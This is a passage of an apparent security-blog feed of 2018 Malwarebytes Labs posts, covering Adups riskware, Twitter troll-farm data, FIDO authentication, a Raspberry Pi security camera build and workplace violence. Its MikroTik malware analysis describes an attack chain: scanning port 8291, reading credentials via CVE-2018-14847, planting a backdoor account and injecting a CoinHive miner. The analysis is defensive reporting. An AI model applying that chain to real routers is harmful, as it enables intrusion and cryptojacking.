Mobile Menace Monday: upping the ante on Adups

Adups comes in many forms, but the most prevalent is Android/PUP.Riskware.Autoins.Fota. This variant can potentially auto install malware like Android/Trojan.Guerrilla, and Android/Trojan.HiddenAds. As addressed in the blogs linked above, it’s a preinstalled system app(s). Thus, it cannot be uninstalled through the device’s information page, only disabled.  However, the nightmare gets worse—Adups can’t even be disabled. Not even a mobile scanner can remove or disable it.

So how do we deal with this Freddy Krueger of a mobile threat? Well, you’re going to have to defeat it in a different realm: the realm of ADB command line tools, a part of Google’s Android Studio. Luckily, we found a wake to wake up from the nightmare, as we recently updated a guide on how to fully uninstall (not just disable) Adups. Beware, though, this tutorial is not for the faint of heart, and only recommended for advanced users.

Safe room

When the boogie men of mobile threats try to break through the walls, we have a safe room for you: Malwarebytes for Android keeps the scariest mobile threats at bay! Stay safe out there!

The post Mobile Menace Monday: top five scariest mobile threats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Information operations on Twitter: new data released on election tampering

Malwarebytes - Thu, 10/18/2018 - 15:00

Back in April, we talked about the wealth of options available to Russian hackers and others launching social engineering campaigns, whether on social networks or through clever attacks launched via Advanced Persistent Threats. Some of that was information published by Twitter at the time in relation to election tampering/interference by so-called “Russian Troll farms”—specifically, the IRA (Internet Research Agency).

Some of the numbers involved were already impressive: 3,841 accounts were linked to the IRA and around 1.6 million notifications were sent out to people who had interacted with these accounts in some way. At the tail end of 2018, Twitter has released yet more data related to this particular campaign.

For example, there’s now an additional 770 accounts (potentially from Iran) to sit alongside the original 3,841 from Russia. That includes “10 million Tweets and 2 million images, GIFs, videos, and periscope broadcasts.” Some of the oldest accounts date back to 2009.

All of this has been put onto an “Elections Integrity” portal by Twitter for researchers to investigate further. That’s 1.24GB of Tweet information and 296GB of media data across 302 archives for the IRA, and 168MB of Tweet information and 65.7GB of media across 52 archives for what’s being referred  to as “Iran.”

DFRLab are one of the organisations given access to the data ahead of time, and the story has recently broken elsewhere, so expect many updates and developments over the next few days. As Ben Nimmo puts it:

They were about the home government first 

– had multiple goals 

– targeted specific activist communities 

– apolitical 

– opportunistic 

– evolved 

– not always high-impact

The timeline of the Tweets is fascinating, as are the posting habits of both Russian and Iranian groups. For example, some individual accounts developed a “personality,” while others just attempted to trend fake stories. That thread is going to grow and grow, so you may wish to bookmark it for easy reference.

Meanwhile,DFRLab are going to be publishing a series of Medium blogs on their findings in more detail. The first is already live, and covers seven key takeaways from the research done so far.

Any doubts you may have had about the likelihood of large scale, long term, professional troll campaigns should have just been swept away. There is no doubt: This is indeed a “full fledged influence op,” and it raises many questions about what’s put into the social sphere, and (more importantly) what we do with it once viewed alongside a response from the platform itself.

We’ve already seen how Russian Facebook ads were used to try and divide opinion in the run up to the 2016 US elections, and it’s clear no expense was spared and no major platform was ignored in the quest to troll the public at large. Everyone needs to step up their game, from the people unwittingly republishing state-sanctioned social engineering ops to the platforms we use on a daily basis possessing the ability to do something about it.

The post Information operations on Twitter: new data released on election tampering appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Is FIDO the future instrument to prove our identity?

Malwarebytes - Wed, 10/17/2018 - 16:52

FIDO, short for Fast IDentity Online, is an industry consortium started in 2013 to address the lack of interoperability among strong authentication devices and the problems users face creating and remembering multiple usernames and passwords. Among the founders were those who work in the financial sector, device manufacturers, and providers of authentication solutions.

What is FIDO?

According to the FIDO Alliance website, FIDO is a set of open and scalable standards that enable simpler and more secure user authentication experiences across many websites and mobile services.

FIDO set out to make authentication devices easier to use and fix the conflicts between devices from different vendors. Their goal is to provide a set of specifications for the entire range of authentication techniques. These specifications should then provide a standard for the entire industry leading to better compatibility and more ease of use.

Logging in

Currently, there are a variety of options for users to log in to their services and devices. We have discussed the basics of two-factor authentication (2FA) in the past, and almost everyone agrees that it is impractical to remember 27 or more passwords and usernames for individual accounts—nor is it safe to re-use passwords through multiple accounts. So, what are our options for logging in?

The most common ones are divided up into these categories:

  • The classic username and password combination
  • Knowing a PIN or TAN code (ATM withdrawals, money transfers)
  • Having access to an email account (when verification codes are sent by mail) or mobile device (texted codes)
  • Secret questions (often frowned upon as they are sometimes easy to guess, or easy to obtain through phishing)
  • Physical keys (card readers, USB keys)
  • Biometrics (fingerprint readers, iris scanners, voice recognition)
  • Mobile devices that can scan barcodes or QR codes and calculate a login code for one time use (Authy, Google Authenticator)
  • Already being logged in to a verified account (e.g. Facebook login)
Problems and solutions

As FIDO seeks to standardize authentication protocols for the wide range of login options listed above, they must identify techniques that are problematic from a security standpoint and look for solutions.

One of the problems with many of the login options is the use of shared secrets, meaning that both the user and the software that checks the login need to know the correct answers. You might be able to keep a secret, but your software could be fooled into handing over all your information to attackers. On a regular basis they succeed in breaching a sites’ or services’ security and obtaining a multitude of login credentials.

One solution for this problem is to use asymmetric cryptography. Basically, a user creates two different keys, a private and a public key. When a user proves that he has the private key by responding to a challenge, the service or website can check the answer that the user provided to the challenge by using the public key, which the user provided the website or service with when he signed up. As a handshake, the server asks the user a question based on the public key that only the holder of the private key can answer. But the answer does not give away the actual private key.

The challenge is created especially for that login attempt, so the answer can’t be used for another login with the same service or a different service. This way, the user is the only one that can answer the challenge and the only one that has access to both keys.

Advantages and disadvantages

The advantages of using asymmetric cryptography are clear:

  • It’s easy to use without having to remember a password.
  • Strong asymmetric encryption can’t be brute forced, unlike weak passwords.
  • The same key combination can be used for multiple logins (not to be confused with the challenge question, which is uniquely generated for each login attempt).
  • It’s impossible to steal from websites and services, even using Man-in-the-Middle attacks, because the private key is never sent across the Internet.

A major set-back could be if the user should ever give their private key to a third party, for example, because she lost it or because she was a victim of a phishing attack that asked directly for the private key. In such a case, having used this method across a multitude of sites and services means the user is in for a multitude of problems: each service she signed in with using this combo could be compromised.

What does FIDO have to do with this?

The FIDO Alliance hosts the open authentication standard FIDO2, which enables strong, passwordless authentication built on public key cryptography using hardware devices like security keys, mobile phones, and other built-in devices. It does this using both the W3C Web Authentication specification (WebAuthn API) and the Client to Authentication Protocol (CTAP), a protocol used for communication between a client (the browser) or a platform (the operating system) and an external authenticator, i.e., the hardware security key.

With these capabilities, the hardware security key can replace weak, static username/password credentials with strong, hardware-backed public/private-key credentials.

Because FIDO2 is an open standard, the security device can be designed for existing hardware, such as phones or computers, and for many authentication modalities. In addition, it can be used for different communication methods, such as USB, Bluetooth, and Near Field Communication (NFC), which allows for contactless authentication to take place safely from many systems and devices.

FIDO2 can be enhanced further still for organizations requiring a higher level of security, as it supports the use of a hardware authentication device with a PIN, biometric, or gesture for additional protection.

Proving your identity in the future

Where FIDO has enabled the industry to make steps toward a safer method of online authentication, it is still far from being the standard it sets out to be. The current usage of FIDO is limited to high-end applications and organizations.

And even though browsers and operating systems have started to develop built-in support for FIDO2, they are not ready for market yet. Also, a new Universal Server certification for servers that operates with all FIDO authenticator types (FIDO UAF, FIDO U2F, WebAuthn, and CTAP) is on its way. And even when those stages are complete, the websites and services that require a secure authentication method will probably need some convincing to start using this new format. And finally, only once early adopters have adapted to the technology and sung its praises will more mainstream usage follow suit.


Using asymmetric keys is the most logical and secure method to prove your identity right now, but it could very well be replaced by a blockchain technology. Given the rate of development in blockchain technology, especially compared to the relatively slow advances made in FIDO, this seems a likely scenario. And it doesn’t help that competing standards are created like the PCI-DSS, instead of bundling the efforts into creating an all-encompassing standard.

The one standard to rule them all will probably be the one that has the widest applicability. Being able to log in anywhere without the hassle of passwords almost sounds too good to be true, but the answers are out there. Hopefully, with the application of the best standard, we will see a future with less breaches and more peace of mind.

The post Is FIDO the future instrument to prove our identity? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to build your own motion-activated security camera

Malwarebytes - Tue, 10/16/2018 - 15:00

Attention makers! Are you looking for a challenging project that not only gets your gears grinding but helps to keep you secure while traveling? Welcome to the build-your-own security camera tutorial.

The impetus for this project originated from events that took place at Defcon 26, where hotel security staff inspected attendee rooms while not properly identifying themselves.

Gross overreach. Violation of your rights. Violation of your privacy. These are always good motivators. The whole story is well covered here.

So our goal is to build a motion-activated security camera that we can use to monitor our own hotel rooms, homes, or other locations. Let’s begin.

Choosing the hardware

While there does exist ready-made hardware that would satisfy my requirements, as a quick web search demonstrated, I would need to assess the security posture of each of these products. Whereas I can build satisfactory security into the hardware if I build it myself.

A selection of commercially available portable spy cameras.

Building such a device should be possible with open-source software and off-the-shelf components. This should be easy, right?

After a quick rummage through my spare parts bin, I found a first-generation Rasberry Pi.

Rasberry Pi classic

After some careful consideration, I elected to have the captured video and stills saved locally. This device is going to be deployed on the most hostile network ever, after all. I could hard wire it to the hotel network, or try and provide it with cellular connectivity maybe by using something like a nova global cellular modem.

I decided against it: Better to start small and limit the scope of the project. I can always add this functionality later, and using a cellular modem isn’t a guarantee that the network traffic will not be tampered with or intercepted.

After some research, I confirmed that the latest version of Rasbian (the official Rasberry Pi OS) still supports the original Rasberry Pi. Further digging yielded 16gb and 32gb SD cards. Both of these would be well suited to the task. I started by performing a fresh install of the Rasbian OS to confirm that everything is okay with this Rasberry Pi. It’s been a few years and I had forgotten exactly why it had been disused.

I downloaded the latest version of Rasbian here.

Software and tools

I then extracted the 2018-06-27-raspbian-stretch.img from the raspbian-2018-06-29/ file, and used Etcher to copy it to said SD card.

Etcher is a program that facilitates writing images to SD cards.

After inserting the SD card into the RPI and connecting a keyboard and monitor to it, I played around with it for a while. Once I was satisfied that, other than being a little old, everything was working, I added some heatsinks, as it is a cheap upgrade. I foresee the device running for several days in a row.

A simple heatsink kit available for the Rasberry Pi.

I also took the opportunity to verify the exact model of Rasberry Pi I had. This was achieved with the command: cat /proc/device-tree/model

The result was: Rasberry Pi Model b rev. 2

I also dug up a cheap USB webcam I already had. The plan was to use that to recycle old hardware and avoid additional costs. (More later on why this was not a good idea for this particular project.) The webcam I had kicking around was a Logitech LZ241DV. I Researched compatibility on It didn’t show much promise.

A quick cntrl + F search on the page listing the Rasberry Pi compatible webcams and typing in the model of the Logitech camera. Zero hits.

Choosing an OS

During my research for this project, it quickly became apparent that the most suited operating system for this project isn’t in fact Rasbian, but motioneyeOS.

motionEyeOS is, according to its github wiki, a Linux distribution that turns a single-board computer into a video surveillance system.

Not only is motioneyeOS specifically tailored to our task, but it has a Rasberry Pi–specific compiled version. I downloaded the appropriate versions for the hardware I have on hand.

I installed motioneyeOS on a different SD card, connected the USB camera, wired in a network cable, and plugged it into a test network I have in the lab.

To connect to the motioneyeOS Rasberry Pi, you can use a browser on any machine on the same network and simply type the IP address of the motioneyeOS Rasberry Pi into the browser. Then, you will be greeted with a web-based management interface.

Simple diagram showing the topology of the motioneyeOS Rasberry Pi in relation to the machine used to configure it via the web interface.

Once the Rasberry Pi was fully booted, I ran a quick Nmap scan of the network on a machine that also resides on the same network: nmap -sP

Example of the nmap command in bash to determine the IP address of the motioneyeOS

It is best to perform this nmap scan before and after turning the Rasberry Pi on. The new address shown by nmap will be the instance of motioneyeOS.

NB: This IP address can change between reboots!

The web-based interface for motioneyeOS, showing the USB camera garbled video

If you connect a monitor to the Raspberry Pi running motioneyeOS, it will also display its IP at the prompt. As we can see, the USB webcam doesn’t want to play video properly. I investigated on the web for a while, and tried routing the USB webcam through a powered hub. (This was one of the possible solutions I found online.) All to no avail.

At this point, to be thorough, I also downloaded the Raspberry Pi 3 image for motioneyeOS.

I flashed it on a 32gb micro SD card, temporarily decommissioned my retro gaming emulation project, and tested the USB webcam on a current and known working Raspberry Pi 3. (The cool thing about this is that restoring that project will only require swapping back my original micro SD card.)

Same results.

So the webcam isn’t going to work without some serious fiddling about. After giving this some more thought, I elected to buy the Raspberry Pi specific camera. If I’m going to have to buy a camera of some sort, best to get one made specific for the Rasberry Pi in the first place.

I settled on the Raspberry Pi Camera Module V2-8 Megapixel, 1080p. There are low light versions of these cameras, but I want the higher picture quality.


And this is where it gets messy. The module that came in the mail was either defective right out of the box, or I zapped it with static electricity early on.

I spent hours reinstalling Rasbian on the original Rasberry Pi, disconnecting and reconnecting the ribbon connector at both ends. I disconnected the camera module from the mini daughter board and reseated it. Reinstalled motioneyeOS, disconnecting and re-connecting the ribbon again. Repeated the whole process with the Rasberry Pi 3, both in Rasbian and motioneyeOS.

This confirmed that the camera module was indeed dead on arrival (DOA). Nothing I did yielded success. The best I could achieve was command line confirmation that the camera was present. The web interface of motioneyeOS always complained that the camera could not be initialized.

I decided to order a different camera module. I settled on the Keyestudio Camera Module 5MP REV 1.3 for Raspberry Pi. It is Rasberry Pi specific, but a different brand than my first attempt.

This solved all the problems, and I was met with success on the first boot attempt of the classic Rasberry Pi running motioneyeOS.

Successful video capture!

To have access to all the features and settings of motioneyeOS, you need to login as “admin.”

The username and password should be changed to something non-default when you deploy this in your hotel room.

I also disabled the FTP server, the samba server, and the SSH server. I want to reduce the surface of attack for this device as much as possible. I can either retrieve the desired footage directly from the micro SD card, or by re-enabling SSH afterwards.

If DHCP is enabled and the network cable is disconnected, the machine will boot loop as it tries to renew an IP address.

In the advanced settings, you can also enable motion notification. This is where you would enable the actions to take place should a motion be detected. This is also where you would configure the aforementioned nova cellular modem.

The final product

So there you have it. After some effort, we have a motion-activated security camera, built with off-the-shelf components and open-source software.

The finished product. (The screen is superfluous and was only used for configuration purposes.)

What lessons did we learn?

  • Don’t assume the hardware you have is working. It went in the junk pile for a reason. For example, I wasn’t able to up-cycle the USB webcam.
  • Micro SD memory cards are small and easily misplaced. (I lost one during this experiment!)
  • SD cards can fail. I used the SD memory card formatter from to confirm this.
  • Even new hardware can be defective. I had a defective Rasberry Pi camera. It failed right out of the box. This forced me to do a lot of detective work and test all the hardware.
  • This wound up being quite a bit more expensive than an off-the-shelf commercial product. It was a great learning experience, though.
What’s left to do?

I need to build a good case for my Frankenstein security camera, because static electricity is a definitive concern here. Exposed electronics is a not a good thing. Also the security staff, should it actually visit your room, might be alarmed at seeing a hodge podge of components and wires sitting on a desk.

There are several articles on the web describing how to build and deploy motioneyeOS on a Rasberry Pi. I always find that they never give you the full story. Failures, both in hardware and software configurations, are an opportunity to learn.

The post How to build your own motion-activated security camera appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 8 – 14)

Malwarebytes - Mon, 10/15/2018 - 15:56

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3

Malwarebytes - Mon, 10/15/2018 - 07:01

Once again, it’s that time of year: time for the quarterly Malwarebytes Labs Cybercrime Tactics and Techniques Report. Strap in your seat belts, folks, because the third quarter of 2018 was quite a wild ride.

After a sleepy first two quarters, cybercriminals shook out the cobwebs and revved up their engines in Q3 2018. With cryptominers and exploit kits maturing, ransomware ramping up with steady, sophisticated attacks, and banking Trojans experiencing a renaissance, we’re having one heck of a season. Attack vectors were at their most creative—and most difficult to remediate—especially for businesses.

In fact, businesses saw far more action this quarter than consumers—their total detections trended upwards by 55 percent, while consumer detections increased only by 4 percent quarter over quarter. It looks like threat actors are searching for more bang for their buck, and business targets are returning more value for their efforts. Banking Trojans and ransomware, traditionally aimed at both businesses and consumers, leaned much harder into their business targets this quarter. Even malware that’s generally favored consumers, such as cryptominers and adware, seems to have graduated to a more professional prey.

Consumers didn’t get away from Q3 unscathed, however. They saw a whole lot of scam action this quarter, especially the ever-classic sexploitation technique, but this time it came with a twist—scammers used stale personally identifiable information (PII) likely pulled from breaches of old to scare users into action. And although the bad guys were up to no good, we at Malwarebytes had a field day taking a bunch of them down.

So how did we draw our conclusions for this report? As we’ve done for the last several quarterly reports, we combined intel and statistics gathered from July through September 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines.

If you want to learn more about the key developments in cybercrime last quarter, including the latest threats, newest attack methods, noteworthy scams, and predictions for Q4 cybercrime trends, check out the full Malwarebytes Labs Cybercrime Tactics and Techniques Report.

The post Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Workplace violence: the forgotten insider threat

Malwarebytes - Fri, 10/12/2018 - 16:00

Organizations are no stranger to insider threats. In fact, for those who have been around long before the Internet, workplace violence, (alongside spying) is a problem many businesses have seen before and sought to address.

However, the adoption and use of the Internet completely changed the way organizations run and grow their businesses, how customers can communicate with companies, and how employees do their jobs. And with this advancement—as we’re well aware by now—comes new, more sophisticated challenges that can compound the risks that organizations face from insiders.

When it comes to security, many enterprises are focused on beefing up their system and network defenses to keep outside hackers from getting their hands on digital assets. In addition, organizations are now more aware of the threat that malicious insiders pose—whether that’s stealing proprietary information or spying for competitors. Yet it seems that little or no attention is given to addressing workplace violence as a whole.

An overview of workplace violence

In our previous blog on insider threats, we defined workplace violence (WPV) as “violence or threat of violence against employees and/or themselves.” This can manifest in the form of physical attacks, threatening or intimidating behavior and speech (written, verbal, or electronically transmitted), harassment, property damage, or other acts that could put people at risk.

Early signs of potential for violence include threats of bodily harm (often framed as a joke, a passing comment, or a verbalization of violent thoughts), insults, passive-aggressive actions, dramatic or unreasonable demands, withdrawal (especially if they used to be sociable), and sudden undue whining or complaining. Other manifestations may not be evident at first, too.

Knowing this, one might think it is essential for organizations of any size to be able to identify and tackle workplace violence head on, on top of improving their network defenses. Sadly, this isn’t the case.

Although organizations are required by law to keep employees safe by creating a healthy, hazard-free workplace environment, almost half of executives in a corporate survey conducted by TAL Global, a security and risk management company, believe that “workplace violence is not an issue that needs to be addressed.” It’s also frustrating to note that more than half of these executives “do not believe that workplace violence will create a negative impact on their budget.”

This is a serious oversight, especially when the Department of Justice estimates that workplace violence costs US businesses about $36 billion per year in lost productivity, property, and most importantly, employee lives.

The workplace, redefined

While we’re about WPV, it’s important to remind ourselves that the definition of “workplace” has evolved over time and is no longer confined within the walls of a traditional office building. Today, the workplace can be your home, your favorite coffee shop, the local library, or even a co-working space.

Over the last decade, the number of telecommuting workers has increased by 115 percent, according to a 2017 report from Global Workplace Analytics and FlexJobs. And while working from home is beneficial for both employees and employers, it also comes with its own risks.

While organizations must be sure to protect their sensitive client and company data accessed outside of the office network by remote workers, they also have to ensure workplace security in the telecommuter’s home office.

Why? Because a home office, according to the Occupational Safety and Health Administration, is still under the employer’s jurisdiction. Therefore, they must make sure that home offices are safe and hazard-free. This could also mean that policies governing workplace violence could be adapted from the office to the home office.

Is workplace violence on the rise?

Perhaps. The TL;DR answer to that question is this: It depends on the industry (e.g., incidents of workplace violence in healthcare are far more common than in other industries) or the type of violent incident (e.g., non-fatal assaults have decreased while workplace homicides have increased).

Regardless of whether WPV has decreased or increased, it’s clear that the issue needs addressing. The promotion and adherence to the “It wouldn’t happen to us!” myth didn’t save organizations from hackers breaching their systems, so why should it keep them from WPV incidents?

Read: 5 cybersecurity questions retailers must ask to protect their businesses

Types of WPV

Talking about workplace violence may conjure up highly-publicized images of active shooters stationed on campus. Let us keep in mind, however, that not all workplace violence events happen this way. According to Steve Crimando, an expert in the field of threat assessment and threat management, there are five current types we all need to familiarize ourselves with. They are:

  • Criminal intent. This type usually involves criminals who target establishments, often, with the intent to steal. Robbers and shoplifters belong to this type.
  • Customer/Client. This type is perpetrated by customers or patients (including their relatives) against one or more workers servicing them. Verbal abuse against workers in healthcare and social services is an example.
  • Worker-to-worker. This is probably the type employees can relate to the most. These acts of violence can be perpetrated by either current or former employees toward one or more other employees of an organization. Workplace bullying is an example of this type.
  • Domestic violence. More commonly, women have been victims of domestic violence in the workplace, but that isn’t to say that this doesn’t happen to men.
  • Ideological violence. This type could either be perpetrated by radicalized employees or external actors targeting organizations, its people, and properties for reasons related to their ideology, politics, or religion. Active shootings and terrorist attacks are examples that fall under this type.

Some organizations only partially recognize stalking and cyberbullying as workplace violence, but we’d consider them to be as well.

Practical ways organizations can help address WPV

Marianne Alvarez, co-founder and director of training at the ALICE (Alert, Lockdown, Inform, Counter, Evaluate) Training Institute in California, has provided tips on how organizations can prepare themselves for potential incidents of workplace violence. Her recommendations include:


Organizations must check the overall health of the organization’s safety and physical security. This may involve hiring a certified risk assessment professional who can conduct a full onsite evaluation of security gaps or weaknesses the business may have to address. The risk assessment professional inspects infrastructure weaknesses (locks, CCTV cameras, etc.) and prevention and training programs that are in place to see if these need to be enhanced as well.


Once the risks and weaknesses are identified, the organization can then prioritize which ones to address first. During the prioritize phase, they should also set a plan and a budget.


Organizations must continue training—or in some cases, re-training—their employees on how to how to respond to incidents of workplace violence, whether it be a full-blown shouting match between two workers or an incident involving aggressive intruders.

It’s imperative that companies stress the importance of preventing the escalation of a negative encounter in the workplace to an active shooting event.

“The training should include a blended model of classroom-type learning, a test to ensure learning, and drills to practice what they learned,” said Alvarez. “Much like CPR, one must be able to apply the appropriate concepts while under the pressure of a critical event. The only way to ensure this is to repeat the practice of the concepts in live drills.”

When work life bleeds into personal life

Modern-day workers have come to perceive and accept their work lives as something inseparable from their personal lives. It’s a mindset and lifestyle prevalent to those working in tech industry hotspots like Silicon Valley, as well as financial hubs such as Wall Street. So feeling like a failure in work could make one feel like a failure in life.

“An employee can feel that they give their all to a company, making employment feel like less of a job and more a way of life,” said Leslie Garcia, CEO of Executech Security Solutions. “When not recognized for their efforts or terminated for poor work performance, this could possibly trigger a retaliatory emotional and potentially dangerous physical response.”

It’s vital to address vulnerabilities in systems that endanger valuable data. However, it is equally important to take care of the people under organizations’ watch. Ideally, an overall workplace security posture—that which covers the protection and safety of the business’s infrastructure, tangible assets, digital assets, and its people—coupled with a culture that intentionally ingrains security behaviors, awareness, and proper reporting practices—would be able to mitigate workplace violence as well.

In the face of workplace violence, these are thoughts organizations must ponder, recognize, accept, and take action on. The lives of their employees depend on it.

Recommended reading:

The post Workplace violence: the forgotten insider threat appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake browser update seeks to compromise more MikroTik routers

Malwarebytes - Fri, 10/12/2018 - 15:00

This blog post was authored by @hasherezade and Jérôme Segura.

MikroTik, a Latvian company that makes routers and ISP wireless systems, has been dealing with several vulnerabilities affecting its products’ operating system over the past few months. Ever since a critical flaw in RouterOS was identified in late April 2018, attacks have been going on at an alarming rate, made worse when a newly-found exploitation technique for CVE-2018-14847 was identified.

Part of the problem is that a large number of MikroTik routers remain unpatched and are prey for automated attacks, despite security fixes made available by the vendor. Criminals were quick to leverage Proof of Concept code to compromise hundreds of thousands of devices in a short time frame. Last summer, researchers at SpiderLabs discovered what was perhaps the biggest malicious Coinhive campaign via hacked MikroTik devices, which has evolved into a much wider problem now.

With this latest trick, users behind compromised routers are served a fake browser update page. When they run this malicious update, it unpacks code onto their computer that scans the Internet for other vulnerable routers and tries to exploit them.

Suspicious browser update

Security researcher @VriesHd first spotted a new campaign attempting to further compromise vulnerable routers using a typical social engineering technique. Internet providers that operate infected MikroTik routers will serve this malicious redirect about an “old version of the browser” to their end users:

According to a search via Censys, there are about 11,000 compromised MikroTik devices hosting this fake download page:

The alleged browser update is suspiciously downloaded from an FTP server, as seen below:

Interestingly, this IP address is also listed as a free and open web proxy. Proxies are often used by those who wish to bypass certain country limitations (i.e. watching the American version of Netflix if you are not in the US) or simply as a way to mask their IP address.

Payload analysis

Behavioral analysis

The payload follows the theme of pretending to be an installer named upd_browser.

When we deploy it, it pops up an error:

However, if we capture the network traffic, we can see that in the background it scans various IP addresses, trying to connect on port 8291 (a default port for managing MicroTik routers via Winbox application):


The dropped payload is a relatively big executable (7.25 MB) with a huge overlay. The sections’ headers and their visualizations are given below:

As we can recognize by looking at the sections names, it comes packed by a popular, simple packer: UPX. The size of overlay suggests that there is something more to be extracted. After further examination, we find out that it unpacks a Python DLL and other related files into the %TEMP% folder, and then loads them. At this point, it is easy to guess that this EXE is in reality a wrapped Python script. We can unpack it following the same procedure as the one described here.

The Entry Point is in the script named upd_browser. After decompiling and following the scripts, we find out that the malware’s core consists of two Python scripts: and

Inside the scripts

The main function of the module is pretty simple:

As we can see, the error pop-up is hardcoded: It does not alert about any actual error, but is used as a decoy.

After that, the malware logs the IP address of the victim by querying a hardcoded address of a tracker made using a legitimate service, IP Logger. The tracker takes the form of a one pixel–sized image:

Later, this address is queried repeatedly in a defined time interval.

The most important actions are performed in the function named “scan” that is deployed in several parallel threads (the maximum number of threads is defined as thmax = 600). The function “scan” generates pseudo-random IP addresses and tries to connect to each of them on the aforementioned port 8291. When the attempt of connecting is successful, it tries another connection, this time on a random port from a range of 56778 to 56887. When this one fails, it proceeds with the exploitation:

The function “poc” is meant to infect the router using known vulnerabilities. It starts by attempting to retrieve credentials leveraging the path traversal vulnerability (CVE-2018-14847):

The user.dat file is expected to be in M2 format, so the script comes with a built-in parser (function load_file):

If retrieving the password from user.dat file is successful, it decodes the credentials and uses them to create a backdoor: an account with a randomly-generated password. It also sets a scheduled task to be executed by the router.

The script that is set in the scheduler is generated from a hardcoded template (cleaned version available here). Its role is to manipulate the router’s settings and set up an error page loading a CoinHive miner.

The error page can be dropped in two locations: “webproxy/error.html” or “flash/webproxy/error.html” .

Such a page is displayed to users whenever they try to view a URL to which the access is denied. But the malicious script configured in the router in such a way that basically any HTTP request leads to the error. Yet, the error page is crafted to spoof the original traffic, displaying the requested page as an iframe. So, users may browse most of the web as usual, without noticing the change. Example:

The CoinHive miner is embedded, so during the time this time their machines are used for mining purposes.


MikroTik users are urged to patch their routers as soon as possible and should assume that their authentication credentials have been compromised if they are running an outdated version. MikroTik’s download page explains how to perform an upgrade to RouterOS.

Awareness that these vulnerabilities exist and are easy to exploit is important considering that patching a router is not something many people are used to doing. However, in many cases users will not be able to do so unless their Internet Service Provider does it for them upstream.

With this latest social engineering scheme, we saw how criminals are trying to infect regular users and leverage their computer to scan the Internet for vulnerable routers. This technique is clever because such an effort requires time and resources to be efficient.

Malwarebytes business customers and Premium consumer users are protected from this threat, as our anti-malware engine detects and blocks this fake browser update in real time:

Malwarebytes Endpoint Protection blocks the malicious executable disguised as a browser update.

Indicators of compromise

Sample hash


Coinhive site keys

oiKAGEslcNfjfgxTMrxKGMJvh436ypIM 5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx 5ROof564mEBQsYzCqee0M2LplLBEApCv qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf joy1MQSiGgGHos78FarfEGIuM5Ig7l8h ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma

The post Fake browser update seeks to compromise more MikroTik routers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

6 ways to keep up with cybersecurity without going crazy

Malwarebytes - Thu, 10/11/2018 - 15:00

As we dive headfirst into National Cybersecurity Awareness Month, it seems only fitting to discuss ways to stay on top of developments in modern cybersecurity and privacy. What’s the best way to stay protected? How can you determine if something is a scam? Which big company has been breached now?

The topic of security features heavily across many industries, blogs, and news channels simply because of the current state of affairs. It seems like every day we hear about a new major data breach, affecting thousands—if not millions—of people. From retailers like Target to social media sites such as Facebook to more prominent credit agencies like Equifax—no one is safe.

The uncontrolled nature of attacks coupled with the 24/7 news cycle make it downright overwhelming to keep up with all the cybersecurity information lobbed at us. The widespread release of new attacks, data breaches, systems failures, and malware use have led many to a feeling of security fatigue. We’re essentially all at a point where we’re sick and tired of hearing about it, and frankly disappointed in many companies and individuals who continually fail to protect the data they are responsible for.

Fatigue or not, we shouldn’t collectively ignore what’s happening in the world of cybersecurity right now. We all have a duty to not only protect ourselves, but also our communities, countries, and world over by staying in the know. You can contribute by keeping your knowledge up-to-date and employing a few simple strategies to capture the good information out there and weed out the bad.

1. Follow security professionals and influencers

We live in the information age, where knowledge is digital, recorded and streamed for posterity, stored in giant servers, and available at the entry of a search term. You can acquire new information and expand your knowledge in a variety of ways, according to your preferred methods.

For example, you can glean information from more traditional sources such as news websites and blogs from security experts, but you can also turn to social media, attend webinars and conferences, or communicate directly with someone well-versed in the field.

You could even bring it up at the office water cooler or by making small talk with parents at your child’s school—cybersecurity is covered so much in the media now that it’s become fodder for mainstream chatter. Many will happily discuss more than the just latest breach, possibly drawing up a debate on which security solution is the best or offering up ways in which you can protect yourself from attack.

Whatever you choose, you’ll want to follow some of the top security professionals for the best guidance. Some of my favorites include:

2. Browse security-related social media topics

Most social media networks are great resources for digging up additional content, such as news stories (real ones), videos, opinions, and other posts. In addition, they’re home to a treasure trove of supplemental information on local, national, and global events, career opportunities, top cybersecurity businesses, and more. Of course, social media is not the only place you’ll want to acquire information from, but it can serve as a complement to some of the other channels on this list.

Twitter is especially useful if you know which trends and hashtags to search, as well as who to follow. It allows you to see discussions about current events in real time so you can be right there, in the moment, when things play out.

Twitter lists are also great for creating a niche content feed. You can specify which security vendors, influencers, and developers you’d like to be in your list (or lists), and filter Tweets accordingly. Lists have the added benefit of weeding out noise not pertinent to a particular group—you can focus on a single topic or community.

3. Attend live events

Believe it or not, there’s a huge market for live, in-person cybersecurity events. This includes so much more than conferences, or “cons.” You might also attend lectures, discussions, workshops, networking events, educational courses, or sponsored meet ups.

Web-based events present another great avenue, such as webinars and online community conference calls. Some of the best live cybersecurity speakers will attend such events or be asked to participate, and it stands to reason you can learn a lot from any one of them.

So how do you find such events? You have to keep a pulse on when, where, and what’s happening around you. Local newspapers are great resources for event listings. And of course, there’s always trusty-old Google. Luckily, some of the other channels mentioned in this article will also help keep you informed.

4. Check vulnerability and risk advisory feeds

